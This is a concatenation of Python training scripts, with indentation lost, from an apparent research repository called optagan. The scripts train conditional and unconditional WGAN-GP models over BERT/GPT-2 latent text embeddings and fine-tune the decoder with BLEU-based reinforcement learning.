toks_gpt, mask = pad_seq(toks_gpt, tokenizer_decoder.encode("<PAD>")[0], values.size(1)+1)
toks_gpt = torch.tensor(toks_gpt).to(args.device)
mask = torch.tensor(mask).to(args.device)
values = values * mask[:,1:]
logprobs = logprobs * mask[:,1:]
entropy = entropy * mask[:,1:]
scores = torch.tensor(blue).to(args.device)
# Get value loss
v_loss = value_loss(torch.sum(values, dim=1), scores)
if epoch_ >= 200:
R = 0
rewards = []
# Discount future rewards back to the present using gamma
for j in range(len(values.tolist())):
R = 0
batch_rewards = []
for r in reversed(values.tolist()[j]):
R = r + 0.99 * R
batch_rewards.insert(0,R)
rewards.append(batch_rewards)
# Penalizing low entropy states
rewards = torch.FloatTensor(rewards).to(args.device)
rewards = rewards + torch.log(torch.clamp(entropy,0.2,1))
# Calculate loss
d_loss = torch.sum(torch.mul(logprobs, rewards.detach()).mul(-1))
else:
d_loss = torch.tensor(0)
# Backpropagate losses
loss = v_loss + d_loss
dec_optimizer.zero_grad()
loss.backward()
dec_optimizer.step()
total_scores += torch.mean(scores).item()
total_values += torch.mean(torch.sum(values,-1)).item()
total_v_loss += v_loss.item()
total_entropy += torch.mean(torch.mean(entropy,dim=1)).item()
if (epoch_ % args.interval) == 0:
logger.info("Batch {}/{} | Value Loss:{} | Mean values:{} | Mean BLEU scores:{} | Mean Entropy: {}".format(epoch_,
args.epochs_rl, total_v_loss/args.interval, total_values/args.interval, total_scores/args.interval, total_entropy/args.interval))
total_scores = 0
total_values = 0
total_v_loss = 0
total_entropy = 0
logger.info("Saving decoder")
output_decoder_dir = os.path.join(args.output_dir, 'checkpoint-decoder-{}'.format(global_step))
if not os.path.exists(output_decoder_dir):
os.makedirs(output_decoder_dir)
model_decoder.save_pretrained(output_decoder_dir)
torch.save(args, os.path.join(output_decoder_dir, 'training_encoder_args.bin'))
| [] |
2024-01-10 | Egojr/optagan | optagan~optagan_cond.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
from torch.autograd import Variable
import numpy as np
from modules.gan import cond_Generator, cond_Critic, Classifier
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector, GPT2ForLatentConnectorValueHead
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader, BucketingDataLoaderYelp)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnectorValueHead, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoaderYelp(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data, label): #
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample, label) #
outputs = torch.FloatTensor(B, 1).fill_(1.0) # args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
classifier.train()
cl_train_loss = 0.
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
c_batches = 0
c_loss_0 = 1
g_loss_0 = 1
for i, x in enumerate(train_loader):
label = x[3]
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise and labels
gen_labels = (torch.rand(args.per_gpu_train_batch_size, 1) * args.n_classes).type(torch.LongTensor)
B = args.per_gpu_train_batch_size
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
label = label.cuda()
gen_labels = gen_labels.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
z_real = mean.squeeze(1)
# Evaluate and get losses
z_fake = generator(noise, gen_labels)
real_score = critic(z_real, label)
fake_score = critic(z_fake, gen_labels)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data, label.data)
pred_class = classifier(z_real)
cl_lab = label.clone().squeeze_()
# Classifier loss
cl_optimizer.zero_grad()
cl_loss = nn.CrossEntropyLoss()(pred_class.to(args.device), cl_lab)
cl_train_loss += cl_loss.item()
cl_loss.backward()
cl_optimizer.step()
# Train critic or generator
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
fake_score = critic(generator(noise, gen_labels), gen_labels)
pred_gen_class = classifier(generator(noise, gen_labels)).to(args.device)
cl_gen_lab = gen_labels.clone().squeeze_()
g_cl_loss = nn.CrossEntropyLoss()(pred_gen_class, cl_gen_lab)
g_loss = -torch.mean(fake_score) + g_cl_loss * 10
r_g = abs(((g_loss.item() - g_loss_0) / (g_loss_0 + 0.001)))
r_c = abs(((c_loss.item() - c_loss_0) / (c_loss_0 + 0.001)))
if ((2 + epoch) / epoch) * r_c > r_g:
c_optimizer.zero_grad()
c_batches += 1
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
else:
g_optimizer.zero_grad()
g_batches += 1
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
c_loss_0 = c_loss.item()
g_loss_0 = g_loss.item()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f} | Cl Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item(), cl_loss.item()
))
test_lab = (torch.rand(1, 1) * args.n_classes).type(torch.LongTensor).to(args.device)
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise, test_lab).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Label: {} | Text: {}".format(test_lab.item(), test_z))
c_train_loss /= c_batches + 1
g_train_loss /= g_batches + 1
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f} | Updates G: {} | Updates C: {}'.format(
epoch, g_train_loss, c_train_loss, g_batches, c_batches
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--n_classes', type=int, default=4, help="Overall number of classes")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str)
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder(check this)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Reinforcement learning parameters
parser.add_argument('--finetune_decoder', type=bool, default=True)
parser.add_argument('--epochs_rl', type=int, default=1000)
parser.add_argument('--batch_size_rl', type=int, default=32)
parser.add_argument('--lr_rl', type=float, default=1e-6)
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = cond_Generator(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
critic = cond_Critic(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
classifier = Classifier(args.latent_size, args.block_dim, args.n_classes)
if args.generator_dir!=None:
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
classifier.load_state_dict(torch.load(args.generator_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th'))
cl_optimizer = optim.Adam(classifier.parameters(), lr=args.lr, betas=(0.5, 0.999))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
classifier = classifier.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
test_lab = torch.LongTensor([0]*100 + [1]*100 + [2]*100 + [3]*100 + [4]*100).to(args.device)
for i in range(5):
test_noise = torch.Tensor(np.random.normal(0, 1, (100, args.latent_size))).to(args.device)
test_z = generator(test_noise, test_lab[100*i:100*(i+1)]).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 100, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
data_test = [str(lab)+" "+str(sen) for lab,sen in zip(test_lab.tolist(), data_test)]
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500, True)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500, True)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th')
torch.save(classifier.state_dict(), args.output_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th')
if args.finetune_decoder:
logger.info("Loading generator")
generator.load_state_dict(torch.load(args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
model_decoder.train()
generator.eval()
dec_optimizer = optim.Adam(model_decoder.parameters(), lr=1e-4, betas=(0.5, 0.999))
value_loss = nn.L1Loss()
B = args.batch_size_rl
total_scores = 0
total_entropy = 0
total_values = 0
total_v_loss = 0
for epoch_ in range(args.epochs_rl):
if epoch_ == 200:
# Finetune decoder after training of value head
dec_optimizer = optim.Adam(model_decoder.parameters(), lr=args.lr_rl, betas=(0.5, 0.999))
gen_labels = (torch.rand(B, 1) * args.n_classes).type(torch.LongTensor).to(args.device)
noise = torch.from_numpy(np.random.normal(0, 1, (B, args.latent_size))).float()
noise = noise.to(args.device)
z_fake = generator(noise, gen_labels)
sents, logprobs, values, entropy = rollout(model_decoder, z_fake, tokenizer_decoder, args.max_seq_length, B, 1)
lab_sents = [str(lab)+" "+str(sen) for lab,sen in zip(gen_labels.tolist(), sents)]
p_reference = random.sample(reference, 500)
blue = []
for i in lab_sents:
blue.append(calc_blue_parallel_func(p_reference, [i], 1, 0, True))
values = torch.stack(values, dim=1)
logprobs = torch.stack(logprobs, dim=1)
entropy = torch.stack(entropy, dim=1)
# Get tokens and mask of batch
toks_gpt = [([50258] + tokenizer_decoder.encode(j) + [50259]) for j in sents]
toks_gpt, mask = pad_seq(toks_gpt, tokenizer_decoder.encode("<PAD>")[0], values.size(1)+1)
toks_gpt = torch.tensor(toks_gpt).to(args.device)
mask = torch.tensor(mask).to(args.device)
values = values * mask[:,1:]
logprobs = logprobs * mask[:,1:]
entropy = entropy * mask[:,1:]
scores = torch.tensor(blue).to(args.device)
# Get value loss
v_loss = value_loss(torch.sum(values, dim=1), scores)
if epoch_ >= 200:
R = 0
rewards = []
# Discount future rewards back to the present using gamma
for j in range(len(values.tolist())):
R = 0
batch_rewards = []
for r in reversed(values.tolist()[j]):
R = r + 0.99 * R
batch_rewards.insert(0,R)
rewards.append(batch_rewards)
# Penalizing low entropy states
rewards = torch.FloatTensor(rewards).to(args.device)
rewards = rewards + torch.log(torch.clamp(entropy,0.2,1))
# Calculate loss
d_loss = torch.sum(torch.mul(logprobs, rewards.detach()).mul(-1))
else:
d_loss = torch.tensor(0)
# Backpropagate losses
loss = v_loss + d_loss
dec_optimizer.zero_grad()
loss.backward()
dec_optimizer.step()
total_scores += torch.mean(scores).item()
total_values += torch.mean(torch.sum(values,-1)).item()
total_v_loss += v_loss.item()
total_entropy += torch.mean(torch.mean(entropy,dim=1)).item()
if (epoch_ % args.interval) == 0:
logger.info("Batch {}/{} | Value Loss:{} | Mean values:{} | Mean BLEU scores:{} | Mean Entropy: {}".format(epoch_,
args.epochs_rl, total_v_loss/args.interval, total_values/args.interval, total_scores/args.interval, total_entropy/args.interval))
total_scores = 0
total_values = 0
total_v_loss = 0
total_entropy = 0
logger.info("Saving decoder")
output_decoder_dir = os.path.join(args.output_dir, 'checkpoint-decoder-{}'.format(global_step))
if not os.path.exists(output_decoder_dir):
os.makedirs(output_decoder_dir)
model_decoder.save_pretrained(output_decoder_dir)
torch.save(args, os.path.join(output_decoder_dir, 'training_encoder_args.bin'))
| [] |
2024-01-10 | Egojr/optagan | optagan~ad_wgan_gp_train.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
import numpy as np
from modules.gan import Generator, Critic
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoader(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data):
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample)
outputs = torch.FloatTensor(B, 1).fill_(1.0) #args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
#grads = grads.view(B, -1)
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
c_batches = 0
c_loss_0 = 1
g_loss_0 = 1
for i, x in enumerate(train_loader):
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise
B = args.per_gpu_train_batch_size
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
z_real = mean.squeeze(1)
# Evaluate and get losses
z_fake = generator(noise)
real_score = critic(z_real)
fake_score = critic(z_fake)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data)
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
fake_score = critic(generator(noise))
g_loss = -torch.mean(fake_score)
r_g = abs(((g_loss.item() - g_loss_0) / (g_loss_0 + 0.001)))
r_c = abs(((c_loss.item() - c_loss_0) / (c_loss_0 + 0.001)))
# Update critic or generator
if ((2 + epoch) / epoch) * r_c > r_g:
c_optimizer.zero_grad()
c_batches += 1
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
else:
g_optimizer.zero_grad()
g_batches += 1
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
c_loss_0 = c_loss.item()
g_loss_0 = g_loss.item()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item()
))
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Text: {}".format(test_z))
c_train_loss /= c_batches + 1
g_train_loss /= g_batches + 1
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f} | Updates G: {} | Updates C: {}'.format(
epoch, g_train_loss, c_train_loss, g_batches, c_batches
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str, help="Directory where GAN models are saved")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder(check this)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
